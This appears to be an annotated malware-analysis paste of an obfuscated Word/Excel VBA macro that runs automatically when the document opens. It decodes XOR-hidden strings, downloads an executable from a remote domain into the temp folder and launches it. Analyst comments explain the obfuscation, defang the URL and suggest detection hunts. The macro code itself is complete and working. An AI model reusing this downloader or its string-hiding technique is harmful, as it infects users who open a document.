dynamoo

Malicious Word macro

Dec 12th, 2014
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Public Function XORI(ByVal xicjMaZpt As String, ByVal nMcTEmoJm As String) As String
      ' Analyst note: string de-obfuscation helper (repeating-key XOR).
      '   xicjMaZpt - encoded data (callers in this module pass the output of Hextostring).
      '   nMcTEmoJm - XOR key; reused cyclically, starting at its first character.
      ' Returns the decoded string. Every sensitive string literal in this module
      ' (ProgIDs, HTTP verb, URL, file path) is passed through this function, so
      ' static string scans of the macro see only hex blobs.
      ' The For/Do loops that only call DoEvents never touch the data, the key or
      ' the result; they look like filler inserted by an obfuscator (possibly also
      ' to slow down emulation) - treat as junk when reading the logic.
  10. Dim EOjxkQxT As Long
  11. For EOjxkQxT = 1 To Len(xicjMaZpt)
  12.  
  13. Dim QctTVICL As Integer
  14. Dim cFPFIYBU As Integer
  15. For cFPFIYBU = 0 To 6
  16. DoEvents
  17. Next cFPFIYBU
  18. QctTVICL = 7
  19. Do While QctTVICL < 28
  20. Dim StdTGllU As Integer
  21. For StdTGllU = 0 To 9
  22. DoEvents
  23. Next StdTGllU
  24. DoEvents: QctTVICL = QctTVICL + 1
  25. Dim xMqFiUle As Integer
  26. For xMqFiUle = 0 To 3
  27. DoEvents
  28. Next xMqFiUle
  29. Loop
  30.  
  31. Dim QqSTgmDe As Integer
  32. For QqSTgmDe = 0 To 5
  33. DoEvents
  34. Next QqSTgmDe
      ' The only line that does real work: key position is (i Mod Len(key)), with
      ' Len(key) substituted when the remainder is 0, i.e. a 1-based cyclic index.
      ' The selected key character is XORed with data character i and appended.
      ' An empty key with non-empty data would raise a division-by-zero error on Mod.
  35. XORI = XORI & Chr(Asc(Mid(nMcTEmoJm, IIf(EOjxkQxT Mod Len(nMcTEmoJm) <> 0, EOjxkQxT Mod Len(nMcTEmoJm), Len(nMcTEmoJm)), 1)) Xor Asc(Mid(xicjMaZpt, EOjxkQxT, 1)))
  36. Next EOjxkQxT
  37. End Function
  38. Public Function Hextostring(ByVal cJbMQrQcVo As String) As String
      ' Analyst note: hex-to-text helper used together with XORI.
      '   cJbMQrQcVo - string of hexadecimal digits, consumed two at a time.
      ' Returns one character per hex pair, concatenated in order.
      ' As in XORI, the DoEvents-only For/Do loops do not affect the result and
      ' can be ignored when reconstructing the logic.
  39. Dim IeCvrCT As String
  40. Dim DrBZTx As String
  41. Dim fzEMCirrqv As Long
  42. For fzEMCirrqv = 1 To Len(cJbMQrQcVo) Step 2
  43.  
  44. Dim RhqhLzTZ As Integer
  45. Dim muelWLmV As Integer
  46. For muelWLmV = 0 To 9
  47. DoEvents
  48. Next muelWLmV
  49. RhqhLzTZ = 4
  50. Do While RhqhLzTZ < 97
  51. Dim qfCHorOw As Integer
  52. For qfCHorOw = 0 To 1
  53. DoEvents
  54. Next qfCHorOw
  55. DoEvents: RhqhLzTZ = RhqhLzTZ + 1
  56. Dim BRaAsjQK As Integer
  57. For BRaAsjQK = 0 To 2
  58. DoEvents
  59. Next BRaAsjQK
  60. Loop
  61.  
  62. Dim GQWNnAah As Integer
  63. For GQWNnAah = 0 To 9
  64. DoEvents
  65. Next GQWNnAah
      ' Chr$(38) & Chr$(72) spells "&H", the VBA hex-literal prefix, so Val()
      ' parses the two-digit pair as a byte value and Chr$ turns it into a character.
      ' Building "&H" from character codes keeps that literal out of the source text.
  66. IeCvrCT = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(cJbMQrQcVo, fzEMCirrqv, 2)))
  67.  
  68. Dim AUPhkyFG As Integer
  69. Dim TVkstGBa As Integer
  70. For TVkstGBa = 0 To 4
  71. DoEvents
  72. Next TVkstGBa
  73. AUPhkyFG = 6
  74. Do While AUPhkyFG < 53
  75. Dim HIpHCYEy As Integer
  76. For HIpHCYEy = 0 To 6
  77. DoEvents
  78. Next HIpHCYEy
  79. DoEvents: AUPhkyFG = AUPhkyFG + 1
  80. Dim XNutKALo As Integer
  81. For XNutKALo = 0 To 4
  82. DoEvents
  83. Next XNutKALo
  84. Loop
  85.  
  86. Dim vSKdZNQW As Integer
  87. For vSKdZNQW = 0 To 9
  88. DoEvents
  89. Next vSKdZNQW
      ' Append the decoded character to the accumulator.
  90. DrBZTx = DrBZTx & IeCvrCT
  91. Next fzEMCirrqv
  92.  
  93. Dim giWnjmfl As Integer
  94. Dim wBGkwCdq As Integer
  95. For wBGkwCdq = 0 To 6
  96. DoEvents
  97. Next wBGkwCdq
  98. giWnjmfl = 1
  99. Do While giWnjmfl < 14
  100. Dim FJcQsIId As Integer
  101. For FJcQsIId = 0 To 9
  102. DoEvents
  103. Next FJcQsIId
  104. DoEvents: giWnjmfl = giWnjmfl + 1
  105. Dim MolNiEVg As Integer
  106. For MolNiEVg = 0 To 7
  107. DoEvents
  108. Next MolNiEVg
  109. Loop
  110.  
  111. Dim yLsRBlZm As Integer
  112. For yLsRBlZm = 0 To 9
  113. DoEvents
  114. Next yLsRBlZm
  115. Hextostring = DrBZTx
  116. End Function
  117.  
  118.  
  119. Sub Auto_Open()
      ' Analyst note: auto-run entry point (Auto_Open is the Excel auto-macro name).
      ' Each GoTo jumps to the label on the very next line, so the three
      ' GoTo/label pairs are no-ops; the only effective statement is the call to
      ' GDABRYXEKTS, the routine in this module that starts the download.
  120. GoTo ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  121. ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  122. GoTo ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  123. ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  124. GoTo aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  125. aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  126. GDABRYXEKTS
  127. End Sub
  128. Sub AutoOpen()
      ' Analyst note: Word's auto-macro name; runs when the document is opened
      ' with macros enabled. The GoTo/label pairs are no-ops (each label is on
      ' the next line); the sub simply forwards to Auto_Open.
      ' Triage hint: the presence of AutoOpen / Auto_Open / Workbook_Open together
      ' in one module is a common marker of a templated malicious macro.
  129. GoTo yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  130. yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  131. GoTo ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  132. ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  133. GoTo dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  134. dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  135.     Auto_Open
  136. End Sub
  137. Sub Workbook_Open()
      ' Analyst note: Excel workbook-open event handler name. This module is
      ' attributed as "ThisDocument" (a Word document module), so this handler is
      ' presumably boilerplate kept so the same macro body can be reused in Excel
      ' carriers - confirm against the container the sample came from.
      ' The GoTo/label pairs are no-ops; the sub forwards to Auto_Open.
  138. GoTo iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  139. iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  140. GoTo xjcbjynummnfjcoknrvrjwvktuyoedovqzqddecgukylhlqpagmyiknmvjqaajexfaczvvecgntvrmxhgnsadjmn:
  141. xjcbjynummnfjcoknrvrjwvktuyoedovqzqddecgukylhlqpagmyiknmvjqaajexfaczvvecgntvrmxhgnsadjmn:
  142. GoTo glgrafdzdeiadraasvbjcrojddvmlentroqfjcclqppqlbanjhglngrgwvewemxurhhdxcchbeuudsdmriufmklf:
  143. glgrafdzdeiadraasvbjcrojddvmlentroqfjcclqppqlbanjhglngrgwvewemxurhhdxcchbeuudsdmriufmklf:
  144.     Auto_Open
  145. End Sub
  146. Function VYXQPXIETSZ(ByVal KWIDOJJHRJD As String, ByVal ZPKYKPAZRNC As String) As Boolean
      ' Analyst note: download-and-execute stage.
      '   KWIDOJJHRJD - URL to fetch.
      '   ZPKYKPAZRNC - local path the response body is written to.
      ' Declared As Boolean, but the function name is never assigned, so it always
      ' returns the default (False). No error handling or HTTP status check is
      ' visible; whatever the server returns is written to disk and launched.
      ' All GoTo/label pairs jump to the label on the next line and are no-ops.
      ' Observable behaviour for detection: the Office host process makes an
      ' outbound HTTP GET, writes an .exe under %TEMP%, and that file is then
      ' started through the shell. Hunt on Office processes creating or launching
      ' executables in the user's temp directory.
      ' YKGKMJIBROC is declared but never used.
  147.      Dim UICEAIAVFZZ As Object, YKGKMJIBROC As Long, SYHFRMSETBM As Long, HCABKIAGVDD() As Byte
  148.  
  149. GoTo ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  150. ujhlspviumyqspsnpkgjcpopcahbdbubpeqcpjwqwcgxdschcazspjqugvdfpgoatoiffvfxjxcqcylpyftitwte:
  151. GoTo aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  152. aqynxlaxpejjbqwicohawxriwtthajvyxqqvvoqtgjlxjireadncagbxorhrfbsccvsrscrhmkvdeourvcszwevi:
  153. GoTo webyybgnxnmfpmzlndhxmvkummctbifjbkwbmsqonirxqjfphgfuksemhdkvyiwigsecmcvuoxncsxbjgtuvkrhc:
  154. webyybgnxnmfpmzlndhxmvkummctbifjbkwbmsqonirxqjfphgfuksemhdkvyiwigsecmcvuoxncsxbjgtuvkrhc:
      ' Encoded ProgID; XOR-decoding the hex with key "fTo" gives "MSXML2.XMLHTTP".
  155.     Set UICEAIAVFZZ = CreateObject(XORI(Hextostring("2B07372B185D480C222A1C3B3204"), Hextostring("66546F")))
  156. GoTo ctjfktlfbeoatidssrjyyndyurfcxmwbmjwnfelcpsixtcxnejklummgzpwhnqzerjcgvxjawkmuobgatgfagrym:
  157. ctjfktlfbeoatidssrjyyndyurfcxmwbmjwnfelcpsixtcxnejklummgzpwhnqzerjcgvxjawkmuobgatgfagrym:
  158. GoTo nheerqsywmkvenkohiyoidsvhgbezkzcsslqtikmcznbkybhjkjsylrquiunllgtzwmwivxcfdjqgqkpxziwpder:
  159. nheerqsywmkvenkohiyoidsvhgbezkzcsslqtikmcznbkybhjkjsylrquiunllgtzwmwivxcfdjqgqkpxziwpder:
  160. GoTo qkxahmhprrazkyiqlsuehgvcxohziiargmqwiajfugdbegyerqwxvhaydjpkzsyqduwptcfjcykdxrurdegyufxo:
  161. qkxahmhprrazkyiqlsuehgvcxohziiargmqwiajfugdbegyerqwxvhaydjpkzsyqduwptcfjcykdxrurdegyufxo:
      ' First argument decodes (key "Ujt") to "GET"; third argument False makes
      ' the request synchronous, so Send blocks until the response has arrived.
  162.     UICEAIAVFZZ.Open XORI(Hextostring("122F20"), Hextostring("556A74")), KWIDOJJHRJD, False
  163. GoTo zwfimyqvunpidhmdeeihcjoxqftstmkfjbqezwhkqyjbuzhpoeuyffyzivcigxbgwxxsectoyslcwuvjedporgfv:
  164. zwfimyqvunpidhmdeeihcjoxqftstmkfjbqezwhkqyjbuzhpoeuyffyzivcigxbgwxxsectoyslcwuvjedporgfv:
  165. GoTo frrjpgtapewtbclxycomwlrpnicqelycqcwrbxhefnwnpqcnbrxlwadnfrbaytkmzmgwqcvskyquapfazxjxqgra:
  166. frrjpgtapewtbclxycomwlrpnicqelycqcwrbxhefnwnpqcnbrxlwadnfrbaytkmzmgwqcvskyquapfazxjxqgra:
  167. GoTo yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
  168. yyccrzpgxbfwprorphpzmwkoyffolpcrrxwtaggibqynvnrgdyndpbifodaqmhicshyzkxjrmswlicexsrxbjhvh:
      ' Send argument decodes (key "cOB") to the filler string "vbfghHjk".
  169.     UICEAIAVFZZ.Send XORI(Hextostring("152D2404270A0924"), Hextostring("634F42"))
  170. GoTo ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  171. ojafiiwikrzjoxvdcwavsykagcbkjmfwtuqmwqfzmsvsiourbuvxokfktshdqhsbllznavxkpvodfjyeqsklxczp:
  172. GoTo dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  173. dlqpwhyxwnefrwhcnxsiiidnzkhugqwsitqayzdbzrasxkjpfosymgorsolexnwpiyfkncgpeqpczqchopcepvdv:
  174. GoTo replfcpnregaksytsgdwhpvblxrbspopzewsofsdyvgsnvbnlzjljdhoykexhoxtmzticctffvxuqrfmmwqyubes:
  175. replfcpnregaksytsgdwhpvblxrbspopzewsofsdyvgsnvbnlzjljdhoykexhoxtmzticctffvxuqrfmmwqyubes:
      ' Raw response bytes are copied into the byte array.
  176.     HCABKIAGVDD = UICEAIAVFZZ.responseBody
  177.  
  178. GoTo cqnwurbckebtojxjytrcadkspngeodcidsqurrnpnxnhfwnnxmpldflemdnucckshrvvlcggafguzkdmjarqxuqd:
  179. cqnwurbckebtojxjytrcadkspngeodcidsqurrnpnxnhfwnnxmpldflemdnucckshrvvlcggafguzkdmjarqxuqd:
  180. GoTo jrkalddawnuwtbfmpbtuugdakwrzuedkhmwiuvbvpgdhkmuhasbdqavitosnhyivyojhhcyuzihlqwwzyparouzk:
  181. jrkalddawnuwtbfmpbtuugdakwrzuedkhmwiuvbvpgdhkmuhasbdqavitosnhyivyojhhcyuzihlqwwzyparouzk:
  182. GoTo iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
  183. iyiudojgrwlkltrockyqgjbnbbxsrxqnlnwopjbarujhwujehfsvonwcakflikapvvoyfxbmrfkdmtotvqyuyidr:
      ' Native VBA file I/O: obtain a free file number, open the target path in
      ' binary mode, write the downloaded bytes, close.
  184.     SYHFRMSETBM = FreeFile
  185.  
  186.     Open ZPKYKPAZRNC For Binary As #SYHFRMSETBM
  187.     Put #SYHFRMSETBM, , HCABKIAGVDD
  188.     Close #SYHFRMSETBM
  189. GoTo sroedjmsmnjolxtuezcwgrbwicfmkjaltowqhprstppigpdoxnouraljxkxsbrbdbldurchyxrtcoabjnbrdszjx:
  190. sroedjmsmnjolxtuezcwgrbwicfmkjaltowqhprstppigpdoxnouraljxkxsbrbdbldurchyxrtcoabjnbrdszjx:
  191. GoTo ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  192. ruasvvfhdwnyfwvlyfvgzypqhlekgukmiiwqldehkfvillpnmacqzbvelbbelgjnjtrnwxumtmyukdhajyahmxun:
  193. GoTo lvaarmwbaarlhwvcpseulxvdcjohfcogolkjmswlpfqbzgkjemtmepqurhhriepjruwambkhjdsqpbfitarbfasp:
  194. lvaarmwbaarlhwvcpseulxvdcjohfcogolkjmswlpfqbzgkjemtmepqurhhriepjruwambkhjdsqpbfitarbfasp:
  195.    
  196. GoTo znqihuysdtghaahycrrqbvisezmtshnczkkkdeqrrytbvxnrisozpibxaxkvsgddxxxqvbounudflaewcpaasswb:
  197. znqihuysdtghaahycrrqbvisezmtshnczkkkdeqrrytbvxnrisozpibxaxkvsgddxxxqvbounudflaewcpaasswb:
  198. GoTo fspjmgpjhavdcoyjnvtfrnemahkcnyhrvhlljclijnobaquzcfvtmtemtwwhrbebfahpxvsaodfvnfpggqygnszd:
  199. fspjmgpjhavdcoyjnvtfrnemahkcnyhrvhlljclijnobaquzcfvtmtemtwwhrbebfahpxvsaodfvnfpggqygnszd:
  200. GoTo yfscpxbwkrumiknndjybsajnupufcbrgmflqqhkxaqcbgmjmshskkwngsatybicpehuspvwewuguyjanrsdkcddk:
  201. yfscpxbwkrumiknndjybsajnupufcbrgmflqqhkxaqcbgmjmshskkwngsatybicpehuspvwewuguyjanrsdkcddk:
      ' Encoded ProgID; decodes (key "zLa") to "Shell.Application".
      ' GBIviviu67FUGBK is not declared anywhere in the visible code, so it is an
      ' implicit Variant (no Option Explicit is visible in this module).
  202. Set GBIviviu67FUGBK = CreateObject(XORI(Hextostring("29240416204F3B3C111625021B38081522"), Hextostring("7A4C61")))
  203. GoTo ocjfbiuccshcuudyhwvafgjkhwqzxhxsanjxzwjnfsfanpqjvjmmjxrlbmpkjujxpqzkebnjfqeqspfiziuoqpmz:
  204. ocjfbiuccshcuudyhwvafgjkhwqzxhxsanjxzwjnfsfanpqjvjmmjxrlbmpkjujxpqzkebnjfqeqspfiziuoqpmz:
  205. GoTo dbupijzmbtbpwjeklcbxpjshcbosoyszfvkcbxjdbrkadkatdkgzyoateucioluiayfuqblocvrfocwwdlfcjzln:
  206. dbupijzmbtbpwjeklcbxpjshcbosoyszfvkcbxjdbrkadkatdkgzyoateucioluiayfuqblocvrfocwwdlfcjzln:
  207. GoTo rmnlwcbfaaiuhvxmehbyklvgwqmqyblwjckvaghjoveahbozkqlrcuypnhbadsmeqzynkbosyqyvknpgwmonfzof:
  208. rmnlwcbfaaiuhvxmehbyklvgwqmqyblwjckvaghjoveahbozkqlrcuypnhbadsmeqzynkbosyqyvknpgwmonfzof:
      ' Launches the dropped file. Environ argument decodes to "TEMP" and the
      ' suffix to "\RPDWVRNDBGX.exe". Note the path is rebuilt from hard-coded
      ' strings here instead of reusing ZPKYKPAZRNC; it matches the path the
      ' caller in this module passes, so the two only agree by construction.
  209. GBIviviu67FUGBK.Open Environ(XORI(Hextostring("391F2913"), Hextostring("6D5A6443716F69"))) & XORI(Hextostring("2406210B022E063F0B173F0C5F2A2D1D"), Hextostring("7854714F55"))
  210. GoTo bdkbfedkdtlratgpuunlvwofmvkorkuslzlbfygeejusqrkmtetjfrdbrcaqtxljonnkgvsrkvuubsmnpohsaxsl:
  211. bdkbfedkdtlratgpuunlvwofmvkorkuslzlbfygeejusqrkmtetjfrdbrcaqtxljonnkgvsrkvuubsmnpohsaxsl:
  212. GoTo kgitbajehmaqvftwpmmderrsylumqivpeolnkmfuhopstdnhptpawqidmefpnrosaflidvebmqiqtfkosqzhbcwt:
  213. kgitbajehmaqvftwpmmderrsylumqivpeolnkmfuhopstdnhptpawqidmefpnrosaflidvebmqiqtfkosqzhbcwt:
  214. GoTo evcxsbnbptihxeoacgkhtiewgaluknhitrkqofdplqsgkcsttyipqzfjcwlekrdfkkrccbmppgbfsuwqlbjueekm:
  215. evcxsbnbptihxeoacgkhtiewgaluknhitrkqofdplqsgkcsttyipqzfjcwlekrdfkkrccbmppgbfsuwqlbjueekm:
  216.      
  217. End Function
  218. Sub GDABRYXEKTS()
      ' Analyst note: configuration stage called from Auto_Open. It decodes the
      ' payload URL and the drop path, then hands both to VYXQPXIETSZ.
      ' The GoTo/label pairs are no-ops (each label is on the following line).
      ' Indicators recovered by XOR-decoding the literals below (URL defanged):
      '   URL  : hxxp://jnadvertising[.]com/js/bin.exe   (key "maul")
      '   Path : %TEMP%\RPDWVRNDBGX.exe
      ' VBkjbnlkBK is not declared in the visible code (implicit Variant).
  219. GoTo msdozqikxatqiymvpoxndjjwlinsiqfygblavobcsrklbfsjiaiasrvucaflgcpfriadsvpmzneqjzhotumzlhku:
  220. msdozqikxatqiymvpoxndjjwlinsiqfygblavobcsrklbfsjiaiasrvucaflgcpfriadsvpmzneqjzhotumzlhku:
  221. GoTo qgektnxebrhjehlucdcpolsqbfjqtpwhkclsmsvmcbelspprcdcxqwwxqijouysncceemvdwrerdvvtevjtbhjiz:
  222. qgektnxebrhjehlucdcpolsqbfjqtpwhkclsmsvmcbelspprcdcxqwwxqijouysncceemvdwrerdvvtevjtbhjiz:
  223. GoTo tciyoctvwscdwtrhnjfxzrsptcameapflijtqjcfnuzececzidzrlzbnhuewntradmuopbihgjzvwkiffcakzvtj:
  224. tciyoctvwscdwtrhnjfxzrsptcameapflijtqjcfnuzececzidzrlzbnhuewntradmuopbihgjzvwkiffcakzvtj:
      ' Encoded download URL (see the decoded, defanged value in the header note).
  225. VBkjbnlkBK = XORI(Hextostring("0515011C574E5A060300111A081301051E081B0B43021A01420B06430F081B42081910"), Hextostring("6D61756C"))
  226. GoTo bnmgewoattymhfcbdigylyvifllkqqmxeykyrixkpabrmarmvgnjiiefphyzqjcvwgmmibmibpxiawbbetyeibve:
  227. bnmgewoattymhfcbdigylyvifllkqqmxeykyrixkpabrmarmvgnjiiefphyzqjcvwgmmibmibpxiawbbetyeibve:
  228. GoTo lalxgacguajvaxgihahlbioupxiujzjeytkuiaxerwsrfifjsjdabymljcodxmhozqqltbqsihcqithoxgfytbhi:
  229. lalxgacguajvaxgihahlbioupxiujzjeytkuiaxerwsrfifjsjdabymljcodxmhozqqltbqsihcqithoxgfytbhi:
  230. GoTo pdoqnumlprnzcwyllejdrprtkknbgdtdielizwzijchrjhxrklkxhettzezrhpyrsyxoevzelpbdjiredvoownyx:
  231. pdoqnumlprnzcwyllejdrprtkknbgdtdielizwzijchrjhxrklkxhettzezrhpyrsyxoevzelpbdjiredvoownyx:
      ' Second argument: Environ("TEMP") (key "IYr") followed by
      ' "\RPDWVRNDBGX.exe" (key "eZNuCD"). The same plaintext is encoded with
      ' different keys elsewhere in the module, so hex blobs differ per use and
      ' signatures should target decoded values or the decoder shape instead.
  232.     VYXQPXIETSZ VBkjbnlkBK, Environ(XORI(Hextostring("1D1C3F19"), Hextostring("495972"))) & XORI(Hextostring("39081E31141237140A37041C4B3F3610"), Hextostring("655A4E754344"))
  233. End Sub